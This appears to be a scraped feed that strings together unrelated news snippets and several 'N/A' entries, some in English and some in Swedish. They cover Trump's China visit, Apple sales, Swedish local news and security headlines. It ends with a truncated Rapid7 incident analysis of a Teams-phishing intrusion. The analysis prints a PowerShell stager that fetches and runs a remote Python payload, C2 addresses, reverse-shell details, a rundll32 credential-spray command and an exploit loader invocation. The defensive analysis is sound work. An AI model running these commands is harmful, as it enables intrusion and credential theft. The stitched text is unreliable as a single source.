US President Donald Trump’s landmark visit to China comes as the US-Iran war disrupts global energy supplies, fuels economic uncertainty and adds fresh strain to Washington-Beijing ties. In the latest instalment of a series examining how rivalry, interdependence and geopolitical crises are reshaping the relationship between the two powers, we look at the likely outcomes from Trump’s trip. As Donald Trump arrived in Beijing on Wednesday night for the first US presidential visit in nearly a...

The Iran-linked hacking group MuddyWater (a.k.a. Seedworm, Static Kitten) launched a broad cyber-espionage campaign targeting at least nine high-profile organizations across multiple sectors and countries. [...]

Apple's smartphone sales increased 1.3 percent year-over-year in the United States during the first quarter of 2026, according to data shared by Counterpoint Research. Apple saw a sales increase while the broader U.S. smartphone market experienced a 5.7 percent decline during the same time period. Android device sales declined 14.4 percent, while Apple's market share grew 4 percent year-over-year. iPhone 17 performance is part of the reason Apple outperformed the market, but Counterpoint says the company was also helped by a later launch of Samsung's Galaxy S26 series in March. Apple's market share increased at all three major U.S. carriers, while Android saw a decline. The iPhone made up 75 percent of sales at Verizon, AT&T, and T-Mobile, while Android devices made up 25 percent. Counterpoint expects Apple to continue to draw users to iOS because it maintained pricing with the iPhone 17e and even increased storage, while smartphone makers with slimmer hardware margins have had to raise prices. If Apple can avoid significant price increases and continue to outpace its peers in promotional dollars, it will be tough for Android OEMs to keep up in the year ahead. During Apple's April 30 earnings call, CEO Tim Cook said the ‌iPhone 17‌ family was the most popular lineup in Apple's history. Cook said information from IDC indicated Apple gained market share during the quarter. Cook also said iPhone demand was off the charts, leading to supply constraints during the quarter. Apple was having trouble getting the A19 and A19 Pro chips manufactured by TSMC due to demand for TSMC's AI server chips. According to Cook, memory shortages and rising costs will have more of an impact on Apple later in 2026. Apple is expecting "significantly higher" memory costs and plans to look at a "range of options" for mitigation. Cook declined to provide insight into how Apple plans to deal with the problem, and he did not comment on whether Apple will raise prices.Tag: CounterpointThis article, "Apple Grew U.S. iPhone Sales While Broader Smartphone Market Declined in Q1" first appeared on MacRumors.comDiscuss this article in our forums

The final flight and complex legacy of a pioneering solar-powered aircraft.

I wanted to try codex after 5 months of claude code max subscription. And then I went back to my previous projects on claude design only to realize I don't have access to them anymore.This is a first. I never lost access to any of my past sessions because I unsubscribed in any of the LLM apps.I actually wanted to try out codex previously, but had similar experience with my credits. They gave extra credits equivalent to my montly subscription price, with some time limit because claude has so many issues that month. And as soon as plan ended. I lost access to the credits. Even after resubscribing, I still don't have access to those credits.I have sympathies towards the engineers, especially the ones that are putting themselves on X. But only when someone with large following has some issue, they sort it out.Having worked at a billing company, I can see how complex contracts sound good for the growth/sales folks but are also horrible for engineers actually implementing those contracts. Their complex rate limiting which is now a norm, identifying other harnesses to count them against extra usage are all probably not easy to implement without very rough edge cases. But all the "bugs" are just where the user gets screwed is what is problematic.I just wanted to post this here, after tagging them multiple times on X to alert other users. Comments URL: https://news.ycombinator.com/item?id=48128003 Points: 288 # Comments: 80

The US strikes on Iran sent a clear signal to Pyongyang. But rather than retreat or show renewed interest in denuclearisation, North Korea has doubled down on deterrence. In recent weeks, Pyongyang has tightened security around its leadership and continued its missile launches, underscoring its sensitivity to Washington’s military posture. From Pyongyang’s perspective, these moves are meant not only to gauge how far US military pressure could one day extend, but also to signal that North Korea’s...

Security governance needs to be more than an annual compliance exercise. New companies are emerging to address risk-management gaps in current audit tools.

Eight children are among those reported dead after a series of air strikes hit the south of Beirut.

A US Senate hearing on nuclear capabilities issued a warning about China on Wednesday, hours before US President Donald Trump was due to meet Chinese President Xi Jinping. Senator Roger Wicker, the Mississippi Republican who chairs the Senate Armed Services Committee, said in his opening statement that China has been engaged in an “unprecedented nuclear expansion” in recent years. China, Wicker said, had “rapidly constructed hundreds of new missile silos, expanded mobile missile and ballistic...

Threat actors are publishing RubyGems packages that include scrapers targeting public-facing UK government servers, but with no clear objective.

”Titta vad transparenta vi är”, heter det från Vita huset. Vad sägs om lite rykande färska dokument om JFK och Martin Luther King Jr.? Nähä, det är Epsteinfiler ni vill ha, säger ni. Okej, lite UFO-filer då? Inte det heller. ”Den mest transparenta administrationen någonsin” har det kämpigt.

Blixtsnabba ljusprickar, orangea ”blobbar” och flygande stjärnor. Pentagons senaste släpp av UFO-filer låter lovande för den som är nyfiken på det okända. Men släppet har fått en minst sagt ljummet mottagande. – Vi får väldigt lite information, säger Oskar Jungell på UFO Sverige.

And neither AI nor international conflict are helping

But Pro or Max biz users should know that the company may train its AI on your data

An OPSEC failure provides a window into what helped the ransomware group rise: a generous affiliate model, opportunistic TTPs, and an effective organizational structure.

Approval is no surprise after FCC chair pressured EchoStar to sell licenses.

Senaste nytt - läs de senaste sju dagarnas nyheter på Alingsås Tidning Alingsås Tidning

Distinct form of tooth protein in Homo erectus shows up in Denisovans—and us.

A critical vulnerability affecting certain configurations of the Exim open-source mail transfer agent could be exploited by an unauthenticated remote attacker to execute arbitrary code. [...]

The Trump administration on Wednesday publicly renewed an offer of US$100 million in humanitarian aid to Cuba, stepping up pressure on Havana despite Beijing’s continued political and economic backing for the island. The announcement came as US President Donald Trump travelled to China this week for talks with Chinese President Xi Jinping, with Trump saying before departure that Cuba would be among the issues discussed during the visit. In a statement issued on Wednesday, the State Department...

Apache, Alibaba databases vulnerable and only one has a patch

Article URL: https://www.dailyprincetonian.com/article/2026/05/princeton-news-adpol-proctoring-in-person-examinations-passed-faculty-133-years-precedent Comments URL: https://news.ycombinator.com/item?id=48126848 Points: 381 # Comments: 594

The drugs had an estimated worth of over $9 million USD.

– Det här är den största förändringen av friskolesystemet sedan det infördes, säger Simona Mohamsson (L) om regeringens och Sverigedemokraternas nya förslag om att skärpa villkoren för landets friskolor . Men åtgärderna räcker inte för att stoppa vinstuttagen, menar Socialdemokraternas Anders Ygeman under en debatt i Aktuellt.

Det såg ut att bli en mållös tillställning. Då klev Stina Blackstenius fram och sköt segern till sitt Arsenal på tilläggstid. – Stina gör det väldigt bra, säger lagkamraten Beth Mead i sändningen.

Kevin Warsh blir ny chef för den amerikanska centralbanken Federal Reserve. Det står klart sedan senaten gett honom grönt ljus på onsdagen.

Old "honor code" systems are under strain.

Donald Trump landade inte ensam på kinesisk mark. Med sig till förhandlingarna i Peking har han en stor del av USA:s tech- och finanselit. – En del tolkar det som en tydlig maktuppvisning av USA:s ekonomi och företagsliv, säger SVT:s USA-korrespondent Sofia Yohannes.

ICCL Enforce project offers Verity fact-checking server

Kravet på Postnord om varannan dag-utdelning av brev slopas, rapporterar Dagens industri. I stället ska majoriteten delas ut var tredje dag.

About Silergy Silergy Corp. specializes in the manufacture and sale of power integrated circuits. Silergy Corp. is headquartered in Hangzhou, Zhejiang, China. ---- More than 450 GB of personal data was leaked, along with a vast amount of financial and private information, including contracts containing non-disclosure clauses, passports, and customer and partner data.

Meta today announced the launch of Instants, a new image sharing option on the Instagram social network. Instants are ephemeral photos that disappear from Instagram after they're viewed by a user's friends or after a 24-hour period. Reactions and replies to Instants images show up in DMs instead of on the post. Instants photos are only displayed for a short period, but they are saved to a user's archive for a year and can be reshared to Stories. Instants cannot be edited, with no option for filters, stickers, or modifications beyond captions. That sets them apart from Stories, which is already an Instagram feature. Instants is an Instagram feature, but Meta has also developed a standalone Instants companion app "for quicker camera access." The standalone app is a direct competitor to Snapchat, the original ephemeral image social network. The new app can be used for sharing Instants, but on Instagram, users can also share Instants from a new camera option in the Direct Messages section of the app. Instants can be viewed on Instagram by opening up DMs and tapping on the new Instants box in the bottom right corner of the inbox. Photos can be shared with friends set as close friends, or as mutuals, aka followers that an Instagram user follows back. Instants are not able to be screenshotted or screen recorded, providing privacy features not available with other Instagram image types. Meta says that Instants are designed for casual, everyday photos. The standalone app is limited to select countries, as Meta says that it is an experiment. Images shared on the Instants app will show up for friends on Instagram, and images shared on Instagram will show up in the Instants app. Instants on Instagram is available globally starting today, and the app is also available for download in countries where it is supported.Tags: Instagram, Meta, PhotosThis article, "Meta Launches 'Instants' App for Sharing Disappearing Photos on Instagram" first appeared on MacRumors.comDiscuss this article in our forums

The type of bar matters when it comes to how it bends and recoils, but why is still a mystery.

Article URL: https://www.propublica.org/article/evicore-health-insurance-denials-cigna-unitedhealthcare-aetna-prior-authorizations Comments URL: https://news.ycombinator.com/item?id=48126000 Points: 215 # Comments: 203

Informa TechTarget's flagship cybersecurity media brand launches a special content series to mark two decades as a trusted source for cybersecurity professionals.

"NASA also is defining the concept of operations for the mission."

Article URL: https://www.jdhodges.com/blog/macbook-neo-benchmarks-analysis/ Comments URL: https://news.ycombinator.com/item?id=48125617 Points: 330 # Comments: 389

What you need to know about Donald Trump vs President Xi

Europas sug efter olja och gas har blivit en god affär för de norska oljebolagen. Nyligen fattade den norska regeringen beslut om att öppna för jakt efter nya olje- och gasfynd.

N/A

N/A

N/A

Apple is looking into ways to better support apps that include AI agents and AI coding capabilities in the App Store, reports The Information. Apple is designing a system that would maintain its security and privacy standards while allowing for AI app features, but details on how the system will work are unavailable. Apple started blocking updates for some popular vibe coding apps in March because those apps violated ‌App Store‌ rules that prohibit apps from executing code that alters their own functionality or that of other apps. Vibe coding apps let users build apps and websites with little to no coding experience, using AI agents and natural language prompts. Vibe coding has become popular, and Apple's rules have not been able to keep up. Apps that include AI agents present similar problems for Apple. AI agents can autonomously complete complex actions and make mini apps using tools and capabilities that would not traditionally be supported under Apple's ‌App Store‌ rules. Apple will need to make changes to keep up with the software trends that developers and users want. Apple wants to incorporate AI agents into the ‌App Store‌ while preventing some of the issues that people have run into with rogue AI agents deleting content and causing other problems. As it works to prepare for future AI apps, Apple is also developing its own AI capabilities. Siri is set to get a major overhaul in iOS 27, making it smarter and better able to compete with Claude and ChatGPT. Apple has partnered with Google to use custom Gemini models to power ‌Siri‌. The Information says Apple has started contacting app developers to integrate app capabilities like booking flights and sending calendar invites into the new version of ‌Siri‌ and Apple Intelligence. Some developers are hesitant to work with Apple to integrate their apps into ‌Siri‌ because they are worried about providing new ways for Apple to collect commissions. Apple is telling some developers that it does not plan to charge commissions during the early stages of the partnership, but that fees are a possibility in the future. Apple has held talks with Baidu, Alibaba, and Tencent about ‌Siri‌ integration in ‌iOS 27‌, but the companies do not want to end up paying fees to Apple. Apple also plans to allow users to select from multiple chatbots to use with ‌Siri‌, instead of limiting people to OpenAI's ChatGPT. AI models from companies like Anthropic or Google could be used for Image Playground and Writing Tools the way ChatGPT can be used today. It is not clear if Apple plans to open up more of iOS to third-party chatbots, but OpenAI has reportedly been disappointed with Apple's limitations. ChatGPT can be used to generate images and text through the iOS integration, but it cannot access user emails or other personal information. Customers are also rarely using the functionality, according to The Information. Apple's new version of ‌Siri‌ is expected to be unveiled at the WWDC keynote on June 8, and the plans that Apple has for agentic AI apps in the ‌App Store‌ could also be discussed at the same time.Related Roundup: iOS 27Tags: App Store, The InformationThis article, "Apple Working on Plan to Allow AI Agent Apps on the App Store" first appeared on MacRumors.comDiscuss this article in our forums

N/A

N/A

N/A

N/A

MicroMarketing specializes in expert title selections for books, audio CDs, and DVDs, catering primarily to librarians and libraries. The company is known for its personalized service, ensuring that clients receive timely and efficient support without automated responses. They offer valuable services such as downloadable invoices and MARC records, along with a strong price-value proposition. MicroMarketing's commitment to quality and customer satisfaction has garnered positive testimonials from clients who appreciate their reliable and responsive service

Pamil Modulsystem specializes in renting flexible modular buildings tailored for various needs, including offices and schools. Established in 1963, the company focuses on providing high-quality, customizable solutions that enhance work and learning environments. They manage the entire process from planning and construction to maintenance, ensuring a seamless experience for their clients. Committed to sustainability, Pamil emphasizes circular building practices by renovating returned modules for future use.

Tricon Infotech delivers efficient, automated solutions and full digital transformations through custom products and enterprise implementations. The company's worldwide clients include leaders in the publishing, educational technology, finance, and legal sectors

Hur mycket dyrare blir bensinen om Helldén får bestämma – och vad är han bättre på än kollegan Amanda Lind? MP:s språkrör svarar på publikens frågor direkt från sitt privata kontor, ingen fråga är förbjuden!

Microsoft has responded to the MacBook Neo by commissioning a study that highlights advantages of some Windows laptops. Market research firm Signal65 evaluated four Windows laptops:Lenovo's IdeaPad Slim 3x Lenovo's Yoga 7i HP's OmniBook 5 HP's OmniBook X FlipWith a starting price of $549.99 on Best Buy's online store in the U.S. at the time of this writing, the IdeaPad Slim 3x is the only laptop in the study that currently rivals the MacBook Neo's starting price of $499 (college students) to $599 (general public). The other three laptops currently start at $749 to $1,029 at Best Buy. Signal65 outlined some of the IdeaPad Slim 3x's advantages over the MacBook Neo: Feature IdeaPad Slim 3x MacBook Neo Display Size 15.3-inch 13-inch CPU Snapdragon X1 with "90% faster" multi-core Cinebench 2026 score A18 Pro Base RAM 16GB 8GB Fingerprint Scanner Included Touch ID limited to $699 model Ports 1× USB-C, 2× USB-A, SD, and HDMI 2× USB-C only Wi-Fi Wi-Fi 7 Wi-Fi 6E Backlit Keyboard Yes No Touch Screen Yes No In addition, the IdeaPad Slim 3x achieved longer battery life (16 hours and 29 minutes) compared to the MacBook Neo (13 hours and 28 minutes) in a Tom's Guide test, with Lenovo able to fit a larger battery inside a 15-inch laptop. The study indicated that the IdeaPad Slim 3x has 512GB of storage, but the $549.99 base model has a 256GB SSD, which matches the MacBook Neo. Through June 30, Microsoft is offering U.S. college students a free one-year Microsoft 365 Premium subscription, a free one-year Xbox Game Pass Ultimate subscription, and a free Xbox controller with the purchase of a qualifying Windows laptop, including the IdeaPad Slim 3x. The bundle has a value of more than $500. On the other hand, the MacBook Neo has some advantages over the IdeaPad Slim 3x: Feature MacBook Neo IdeaPad Slim 3x Display Resolution 2,408×1,506 pixels (Retina quality) 1,920×1,200 pixels Display Brightness 500 nits 300 nits Build Material Fully aluminum enclosure Mix of aluminum and plastic Webcam 1080p camera 720p camera Moreover, many reviewers indicated that the MacBook Neo has a superior trackpad and speakers compared to Windows laptops within the same price range. Plus, the MacBook Neo runs macOS instead of Windows, so it benefits from Apple's tight hardware and software integration and features that work across multiple Apple devices. While it is unsurprising that this Microsoft-backed study is focused on promoting Windows laptops, the reality is that the MacBook Neo and the IdeaPad Slim 3x both have pros and cons. More competition in the affordable laptop market is a win overall.Related Roundup: MacBook NeoTags: Lenovo, Microsoft, WindowsBuyer's Guide: MacBook Neo (Buy Now)Related Forum: MacBook NeoThis article, "New Study Highlights Advantages of $549 Windows Laptop Over MacBook Neo" first appeared on MacRumors.comDiscuss this article in our forums

N/A

N/A

Den variant av hantavirus som har spridits på MV Hondius skiljer sig inte från liknande virusutbrott, enligt den europeiska smittskyddsmyndigheten ECDC. Samtidigt väntas fler personer insjukna de närmsta veckorna. – Det är en väldigt komplex situation, säger ECDC-chefen Pamela Rendi-Wagner.

Här är ett urval av händelserna i Västsverige under onsdagen den 13 maj.

Nigel Farage, ledare för högerpopulistiska Reform UK, utreds för att ha tagit emot fem miljoner pund utan att redovisa detta, rapporterar brittiska medier .

Since Intel Meteor Lake has been the Intel Silicon Security Engine to serve as a silicon root-of-trust for secure firmware loading, boot measurements, and similar functionality. This Intel Silicon Security Engine has been built on with Lunar Lake and Panther Lake as well as set to take on more importance with future Intel hardware platforms. We are now seeing a Linux driver come for this silicon RoT with the Intel Silicon Security Engine Interface (ISSEI)...

En man i 30-årsåldern hemmahörande i Östersunds kommun döms till fängelse i två år och tre månader för att ha våldtagit ett barn. Han döms även för misshandel och olaga hot, men frikänns för grovt olaga hot och grovt övergrepp i rättssak.

N/A

AI rollback rates hit 81% at firms with mature guardrails, suggesting enterprises are struggling to manage the systems in production, says Sinch

Trafikverkets varning: rådjur på vägen på E20 Alingsås Tidning

A cybersecurity researcher has published proof-of-concept (PoC) exploits for two unpatched Microsoft Windows vulnerabilities named YellowKey and GreenPlasma, which are a BitLocker bypass and a privilege-escalation flaw. [...]

Physicist warns proposed Stratos campus could seriously affect local environment

6 grader och mulet och regnskurar i Alingsås under kvällen Alingsås Tidning

Security pros warn YellowKey claim could make stolen laptops a much bigger problem

Apple has stepped in to warn that EU proposals to force Google to open Android to competing AI services pose serious risks to user privacy, security, and safety. Apple's latest submission to the EU comes (via Reuters) in response to the European Commission's call for feedback on draft measures designed to help Google comply with the Digital Markets Act (DMA). The proposals would allow competing AI services to interact with Android apps to perform actions such as sending emails, ordering food, or sharing photos. Google has already pushed back on the plans, arguing they would undermine key privacy and security safeguards for European users. Apple, which is itself now subject to EU measures requiring it to open up its own ecosystem, said it has a strong interest in the case given its own operating systems for iPhone, iPad, and Mac. In its submission, Apple said the draft measures "raise urgent and serious concerns," warning that if confirmed, "they would create profound risks for user privacy, security, and safety as well as device integrity and performance." Apple also took aim at the rapidly evolving state of AI as a particular source of concern, arguing that risks are "especially acute in the context of rapidly evolving AI systems whose capabilities, behaviours, and threat vectors remain unpredictable." The company questioned the EU's technical expertise in drawing up the proposals, stating that the Commission is "substituting judgments made by Google's engineers for its own judgment based on less than three months of work," and suggesting the only discernible goal of the draft measures is "open and unfettered access." Apple has a long history of clashing with EU regulators over the DMA. The company challenged the regulation in court in October 2025, and urged regulators to scrap it entirely the month before, arguing it had created security vulnerabilities and worsened the user experience. The EU said it had no intention of repealing the law in response. The feedback period for the proposals ran from April 27 to May 13, 2026. The European Commission has said it will carefully assess all submissions and may adjust the proposed measures as a result, though its final decision must be adopted within six months of the opening of the specification proceedings, giving a deadline of July 27, 2026. The EU separately concluded in May 2026 that the DMA has had a positive impact overall, setting aside Apple's lobbying for the regulation to be revised.Tags: Europe, European Commission, European Union, Google, ReutersThis article, "Apple Defends Google Against EU Proposal to Give AI Rivals Access to Services" first appeared on MacRumors.comDiscuss this article in our forums

Före detta Gerdsken-profilen gör succé i Elfsborg Alingsås Tidning

Security leaders discuss the first AI-created zero-day exploit.

Washington and Beijing have piled on irritants in advance of this week’s summit between US President Donald Trump and his Chinese counterpart Xi Jinping, suggesting that neither side wants to be seen as a deal killer – even as they try to build potential leverage to bargain away, analysts and former US government officials said. Scott Kennedy, senior adviser with the Centre for Strategic and International Studies (CSIS), said that both sides had been “picking up some chits which they might be...

Following last week's disclosure of the Dirty Frag vulnerability for the Linux kernel, which only finished being patched up in mainline on Monday, Fragnesia is now public as a similar local privilege escalation (LPE) vulnerability...

Following last month's coverage of an unofficial Mac port of Notepad++ that the original developer called out for trademark violation, the dispute has now been resolved with a rebrand. The macOS port was previously released by Andrey Letov under the Notepad++ name without authorization. Don Ho created the original Windows code editor in 2003, and had publicly objected to the unofficial app's use of his trademark and the inclusion of his name and biography on its author page. After settling the dispute, the app has subsequently been renamed Nextpad++. The site for Nextpad++ has been thoroughly updated and clearly states that the app is an "open-source and independent community port of Notepad++ to macOS." Elsewhere, Letov's About page describes the project as a Mac port of the Notepad++ GPL codebase, built on Objective-C++, Scintilla, and Cocoa, and shipped as a universal binary for Apple silicon and Intel Macs. The app also has a new icon. Names aside, it seems Daring Fireball's John Gruber is less than charmed by the result, describing the app as feeling "unholy" and suggesting the rapid port could only have been built with AI vibe-coding tools. The site states development began on March 10. Have you tried out Nextpad++ for Mac? Let us know what you think in the comments.This article, "Notepad++ Mac Port Renamed Nextpad++ After Trademark Row" first appeared on MacRumors.comDiscuss this article in our forums

Article URL: https://kotaku.com/kickstarter-is-the-latest-platform-seemingly-forced-to-ban-adult-content-by-payment-processors-2000695648 Comments URL: https://news.ycombinator.com/item?id=48123198 Points: 394 # Comments: 280

En 21-årig man är häktad i sin utevaro vid Uppsala tingsrätt. Bland annat misstänks han ligga bakom att tre termosbomber placerades ut i Svartbäcken under Uppsala Marathon. Enligt SVT:s källor tillhör han toppskiktet i det kriminella Foxtrotnätverket. Nu jagas han internationellt och är en av de mest prioriterade på Europols lista över efterlysta personer.

Patch series would bring memory-safe code to Linux's s390 port, with compiler caveats attached

Article URL: https://ossresistance.com/ Comments URL: https://news.ycombinator.com/item?id=48123015 Points: 270 # Comments: 84

Gränsöverskridande tågresor kan bli lättare att boka. EU vill samla biljetter från olika operatörer och stärka passagerarnas skydd vid fel i resan.

US President Donald Trump arrived in China – flanked by his top aides and American tech leaders – on Wednesday night as Beijing rolled out a lavish welcome ceremony at the airport. He was received by Chinese Vice-President Han Zheng at Beijing Capital International Airport. Trump’s entourage includes Jensen Huang, CEO of Nvidia and a last-minute addition to the trip, as well as US Defence Secretary Pete Hegseth, US Secretary of State Marco Rubio, billionaire entrepreneur Elon Musk and Tim Cook...

Article URL: https://fredchan.org/blog/locality-domains-guide/ Comments URL: https://news.ycombinator.com/item?id=48122635 Points: 612 # Comments: 212

OverviewAttackers do not need to break into the front door when they can convince employees to open it for them through the tools they already trust.In April 2026, Rapid7 investigated an enterprise intrusion that began with a Microsoft Teams message from a fake “IT Support” account and quickly escalated into a full compromise chain involving malware deployment, privilege escalation, credential theft, lateral movement, and exfiltration. The incident illustrates a critical risk for modern enterprises: Collaboration platforms have become part of the attack surface, and when combined with identity abuse and Living-off-the-Land techniques, they can provide attackers with a low-friction path into the environment.Therefore, this attack was particularly concerning due to the way the intrusion shifted from endpoint compromise to broader identity-driven risk. And while it was not surprising that the attacker used a novel technique, what was concerning was how the attacker was able to chain together familiar enterprise weaknesses into a fast-moving and operationally effective intrusion.By abusing Teams external access, the threat actor delivered a Dropbox-hosted Python payload that established command-and-control, deployed multiple backdoors, and began mapping the internal environment. The attacker then escalated privileges to SYSTEM using CVE-2023-36036 before deploying a fake Windows lock screen designed to harvest the user’s domain password.Once valid credentials were obtained, the intrusion shifted from endpoint compromise to broader identity-driven risk. The attacker moved laterally to a second host, used legitimate tooling such as DumpIt to collect system memory, which was likely exfiltrated via an anonymous file-sharing service. This progression underscores a key reality for defenders: Once collaboration, identity, and endpoint controls are bypassed or weakened, attackers can rapidly convert initial access into meaningful enterprise exposure.Rapid7’s technical analysis linked the Python malware to ModeloRAT, a framework previously documented by multiple security vendors in browser extension campaigns and associated with the KongTuke group. More broadly, this intrusion demonstrates how trusted communication channels, Living-off-the-Land techniques, and credential-focused tradecraft continue to challenge traditional security controls. The takeaways here are clear:For CISOs: Collaboration tools are part of your attack surface. Attackers used Teams to reach users directly. Security, identity protection, endpoint visibility, and rapid detection engineering must be treated as connected parts of the same defense strategy, not separate control domains.For defenders: Old vulnerabilities and trusted tools still work. The attack combined a patched vulnerability (CVE-2023-36036) with widely trusted tools like Python, PowerShell, and Dropbox. None of these are unusual in enterprise environments, which is precisely what allowed the attacker to blend in while moving quickly. It’s an obvious restatement, but external access should always be controlled and monitored. The challenge isn’t identifying one suspicious event; it’s recognizing when normal activity starts to form a pattern, and acting before that pattern turns into widespread exposure.Rapid7 coverageRapid7 has coverage for this campaign across both intelligence and detection workflows. The campaign is available in Rapid7’s Intelligence Hub, providing customers with curated context, indicators, and threat actor tradecraft to support awareness, investigation, and prioritization. Relevant detections are also available in InsightIDR, helping security teams identify activity associated with this intrusion pattern across their environments.Figure 1: Attack chain from Teams phishing to payload delivery, ModeloRAT execution, privilege escalation, and lateral movement with exfiltration.A door that was never closedThe intrusion started with abuse of Microsoft Teams external access. This feature, enabled by default in some environments, allows users in one tenant to initiate direct chats with users in another. In our incident, the attacker used a newly created tenant UCICasociacion.onmicrosoft[.]com to impersonate “IT Support” and messaged a targeted employee.This approach mirrors tradecraft seen in Octo Tempest-style campaigns. Octo Tempest (alias Scattered Spider, UNC3944, 0ktapus) is a financially motivated cybercriminal group active since 2022, known for aggressive social engineering tactics including helpdesk impersonation, SIM swapping, and MFA manipulation. Shortly after the interaction, a hidden PowerShell command executed on the victim’s machine, staging the initial payload.Stager: Bring your own PythonWithin minutes of the Teams interaction, a PowerShell stager executed on the endpoint and reached out to Dropbox to retrieve a ZIP archive (Winp.zip) into the user’s AppData directory.The archive was immediately extracted and deleted, likely to reduce on-disk artifacts and avoid potentially raising suspicion.The payload contained a portable WinPython environment, which the attacker used to launch the next stage:collector.py (reconnaissance)Pmanager.py (primary C2 agent, Modelo RAT)Execution was handled via pythonw.exe, which allowed the script to run in the background without showing the terminal window.iwr -Uri "https://www.dropbox[.]com/scl/fi/[REDACTED]/vuzggemyofftzpk6.zip?rlkey=elabnna8r5omwglaq4feay6ui&st=op5i7lea&dl=1" -OutFile "$env:appdata\Winp.zip"; Expand-Archive -Path "$env:appdata\Winp.zip" -DestinationPath "$env:appdata"; rm "$env:appdata\Winp.zip"; Start-Sleep -Seconds 5; Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\collector.py; Start-Sleep -Seconds 30; Start-Process $env:appdata\WPy64-31401\python\pythonw.exe -ArgumentList $env:appdata\WPy64-31401\python\Pmanager.py; Start-Sleep -Seconds 5Figure 2: PowerShell stager retrieving and executing portable Python payload.Reconnaissance: Environment discovery via native toolsThe first Python module executed by the attacker was collector.py, a post-exploitation information gatherer designed to silently profile the host and save the results to %TEMP%\configA.json. Additionally, before any of the recon the collector.py computes a host fingerprint. This 8-character fingerprint is what the operator's C2 server uses to identify this victim.The script gathered the following information:System identity and patch levelsysteminfo, domain queriesPrivilege contextwhoami /all and .NET Security.Principal checks (USER / ADMIN / SYSTEM)Processes and servicesGet-Process, Get-ServiceNetwork visibilitygetmac.exe, arp -a, Get-NetTCPConnection, ping.exeDomain visibilityran adsisearcher to enumerate accessible systemsAV-SolutionsSecurityhealthhost.exe, which is commonly used to verify if anti-virus solutions are running on the systemTable 1: Host Reconnaissance and Environment Enumeration.All of these commands were executed through hidden PowerShell sessions using the CREATE_NO_WINDOW flag, allowing the script to run in the background without spawning visible console windows.Part of reconnaissance was also a collection of installed hotfixes and system version data. The attacker was able to assess whether the host was vulnerable to a version-specific local privilege escalation exploit later used in the intrusion.Additionally, collector.py and all other python modules dropped by malware were obfuscated. However, it was not difficult to recover code structure close to the original. Figure 3: Obfuscated collector.pyStage 2: Ties to ModeloRATShortly after reconnaissance is completed, the attack shifts into its second stage as with the execution of Pmanager.py.pythonw.exe ...\python\Pmanager.py startFigure 4: Execution of Pmanager.py initiating second-stage C2 activity.As soon as it is started, the script creates a long-running HTTP beacon over port 80 that rotates across 5 hardcoded C2 servers: 46.225.231[.]170, 144.172.99[.]68, 64.94.85[.]158, 140.82.6[.]45, and 45.76.241[.]51.The script can load DLLs via rundll32.exe, launch additional Python scripts, run PowerShell commands, or install .msi packages. It also handles persistence and can update or remove itself. The reconnaissance output saved in configA.json is sent back to the C2, giving the operator a full picture of the host before issuing further tasks.This behavior closely matches the ModeloRAT framework documented by Huntress (KongTuke / CrashFix campaigns). Its communication format, persistence mechanisms, and delivery model all match what has been previously observed, with no significant deviations.The key difference is in initial access: Where earlier campaigns relied on malicious browser extensions, this intrusion used Microsoft Teams social engineering to achieve execution.The on-demand shells and the WebDAV Pmanager quickly deployed its first additional module USOShared1297.py onto the infected host. This module is a TCP reverse shell that opens 2 outbound sockets to one of 3 hardcoded C2 IPs (144.172.88[.]18, 64.190.113[.]187, 45.59.122[.]231. The port 50508 is reserved for the interactive shell that the attacker can use and port 60503 is for file transfer. The shell itself is a cmd.exe spawned using CreatePipe and CreateProcessA with the CREATE_NO_WINDOW and STARTF_USESTDHANDLES flags.This access was then used to test credential reuse across the environment through repeated WebDAV authentication attempts against internal systems.rundll32.exe davclnt.dll,DavSetCookie http:///C%24/WindowsFigure 5: WebDAV authentication spray using davclnt.dll (DavSetCookie)The DavSetCookie API forces Windows to initiate a WebDAV authentication attempt using the current user’s credentials. In effect, it allows the attacker to validate where those credentials are accepted without deploying additional tools. Within minutes, successful logon events started to appear across more than 100 internal systems.The HTTP shell – internal.pyNot long after, the attacker added a second way into the system by deploying back-to-back Microsoft5237.py dropped to %TEMP% and internal.py dropped to WPy64-31401\python. Later analysis showed they were actually the same file, just renamed (both had the same SHA-256 hash: 930263c0843744e269b615fb2ec79f83d7bd8b2cbf75e31fd5ea6c1aaa4e48fd). The attacker was reusing the same backdoor under different names.Each script launched a hidden PowerShell session. First it checked whether the system was domain-joined, and then set up a persistent remote shell.powershell -NonInteractive -NoProfile -WindowStyle Hidden -Command "(Get-CimInstance Win32_ComputerSystem).Domain" powershell -NoProfile -NoExit -Command -Figure 6: The -NoExit flag keeps PowerShell running in the background, while the trailing “-” allows it to accept commands remotely.From there, internal.py turned that session into a full HTTP-based control channel. It registered with the C2 /handshake, continuously polled for instructions via /command/, executed them inside the PowerShell session, and returned output via /output/. The same channel handles file upload, download, and also screenshot capture. All of this communication ran over port 80 to 87.120.186[.]229 and 149.248.78[.]202, blending in with normal web traffic.Stage 3: Privilege escalation via CVE-2023-36036After gaining remote access, the attacker executed ssss.dll to escalate privileges.rundll32.exe ssss.dll startproc Mw2[REDACTED]Figure 7: Execution of ssss.dll via rundll32.The argument that was passed to startproc is a decryption key. The startproc function uses Mw2[REDACTED] to decrypt the payload.The ssss.dll (SHA-256: b00c1cbcfb98d2618a5c2ccb311da94f3c57709a397be6c8de29839f4e943976) is a reflective loader. The loader is using that key to decrypt an embedded payload in memory and execute it. The decrypted payload is testdllLPE.dll (SHA-256: d84245f3a374dd5eff8ecfdfad39077d76331fde799e5306430d0fc788db7f1d), a custom privilege escalation exploit targeting CVE-2023-36036. This vulnerability is a heap-based buffer overflow in cldflt.sys, the Windows Cloud Files Mini Filter Driver.Within seconds, the helper thread launched internal.py under a SYSTEM token, confirming that the exploit successfully modified the process privileges.What is CVE-2023-36036?The Cloud Files driver is what makes OneDrive's "Files On-Demand" work, allowing placeholder files to appear locally while being backed by cloud storage. Sync providers (OneDrive, Dropbox, Box) register themselves with the driver using the Cloud Files API, and the driver brokers I/O between the filesystem and the provider.CVE-2023-36036 is a heap buffer overflow in how cldflt.sys processes messages from these providers. By sending crafted data through the driver’s communication interface, an attacker can overflow an internal buffer and corrupt adjacent memory. With controlled heap layout, this corruption becomes a kernel write primitive.Reused technique, adapted exploitWhile analyzing the CVE-2023-36036 exploit, it became clear that the threat actor did not build their methodology from scratch. STAR Labs documented a similar chain in their analysis of CVE-2021-31969 also in cldflt.sys. Their work outlined the core steps: Register a fake sync provider, shape the kernel heap, trigger the overflow, and overwrite a token.The exploit we 